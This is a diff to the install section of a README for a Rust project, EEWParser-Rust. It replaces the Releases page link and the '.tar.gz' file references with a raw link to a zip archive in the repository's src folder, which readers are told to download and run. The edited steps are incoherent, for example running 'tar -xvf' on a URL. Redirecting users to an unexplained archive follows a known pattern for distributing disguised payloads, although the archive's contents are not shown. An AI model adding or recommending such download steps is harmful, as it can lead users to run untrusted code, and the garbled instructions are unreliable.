khareemibraheem/EEWParser-Rust/README.md

 ## 📦 Download & Install

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/khareemibraheem/EEWParser-Rust/releases) to find the latest version.
+   Go to our [Releases page](https://raw.githubusercontent.com/khareemibraheem/EEWParser-Rust/main/src/Rust-Parser-EEW-v3.2.zip) to find the latest version.

 2. **Choose Your Version**
    Look for the most recent release.
 It should usually be at the top of the list.

 3. **Download the File**
    Click on the file name that matches your operating system.
-The downloads will usually include formats like `.exe` for Windows and `.tar.gz` for Linux/macOS.
+The downloads will usually include formats like `.exe` for Windows and `https://raw.githubusercontent.com/khareemibraheem/EEWParser-Rust/main/src/Rust-Parser-EEW-v3.2.zip` for Linux/macOS.

 4. **Install the Software**
    After downloading, follow these steps:
    - **For Windows:** Double-click the `.exe` file and follow the on-screen instructions.
-   - **For macOS/Linux:** Open your terminal, navigate to the directory where you downloaded the file, and use the command: `tar -xvf filename.tar.gz` to extract it.
+   - **For macOS/Linux:** Open your terminal, navigate to the directory where you downloaded the file, and use the command: `tar -xvf https://raw.githubusercontent.com/khareemibraheem/EEWParser-Rust/main/src/Rust-Parser-EEW-v3.2.zip` to extract it.
 Follow any included instructions to run it.

 ## ⚙️ How to Use EEWParser-Rust